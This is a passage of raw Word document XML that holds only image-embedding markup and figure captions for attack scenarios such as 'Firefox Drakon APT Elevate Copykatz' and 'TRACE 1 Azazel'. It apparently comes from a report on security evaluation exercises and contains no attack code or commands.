                  <pic:blipFill>
                    <a:blip r:embed="rId40">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8842779" cy="3161489"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF252D7" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ACB9D69" w14:textId="621EFC33" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: FiveDirections 2 Firefox BITS Micro APT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B0C445" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E9C0525" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A1CB557" wp14:editId="2C28A751">
            <wp:extent cx="8875095" cy="3132306"/>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1 FiveDirections 2 Firefox Drakon APT Elevate Copykatz Sysinfo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8875095" cy="3132306"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="703FCB1A" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14CDB377" w14:textId="438A2468" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="00365694">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Firefox Drakon APT Elevate Copykatz Sysinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67981799" wp14:editId="55D5B234">
            <wp:extent cx="7033098" cy="5224104"/>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1 FiveDirections 3  Firefox DNS Drakon APT FileFilter-Elevate.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7033098" cy="5224104"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E571B22" w14:textId="600B6BC7" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Firefox DNS Drakon APT FileFilter-Elevate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65AC72" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="343B0591" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CDB75F" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A408558" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AC93D04" wp14:editId="49460CAD">
            <wp:extent cx="5933872" cy="53354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1 MARPLE 1 Firefox Drakon APT.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5934506" cy="5336069"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BAF106" w14:textId="5E4A7805" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: MARPLE 1 Firefox Drakon APT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C57295" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F47B48" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2650F640" wp14:editId="269B56F6">
            <wp:extent cx="7078476" cy="39397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1 TRACE 1 Azazel.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7079674" cy="3940369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C185D8" w14:textId="6DE4D2B8" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: TRACE 1 Azazel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BCE9A4" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D0276A4" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="301CCA5E" wp14:editId="511AD77A">
            <wp:extent cx="7185359" cy="3774332"/>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1 TRACE 2 Azazel.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7185359" cy="3774332"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC0A3A8" w14:textId="0330FA9E" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: TRACE 2 Azazel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22154CBE" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755C967E" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DCF513F" wp14:editId="45DEF632">
            <wp:extent cx="8976036" cy="3871608"/>
            <wp:effectExtent l="0" t="0" r="317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5.2 Ubuntu 1 SSH BinFmt-Elevate.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8976036" cy="3871608"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B54EEE1" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EA0BB8" w14:textId="0C36EB64" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>:TA52 Ubuntu 1 SSH BinFmt-Elevate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CB12B5" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507971D9" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5222A22D" wp14:editId="5FA456D9">
            <wp:extent cx="8772402" cy="3414408"/>
            <wp:effectExtent l="0" t="0" r="381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5.2 Windows 1 Firefox Drakon APT Elevate Copykatz 1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8772402" cy="3414408"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8489D6" w14:textId="77777777" w:rsidR="000112FB" w:rsidRDefault="000112FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DE12FF" w14:textId="23B02085" w:rsidR="000112FB" w:rsidRDefault="000112FB" w:rsidP="000112FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="006C3099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: TA5.2 Windows 1 Firefox Drakon APT Elevate Copykatz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
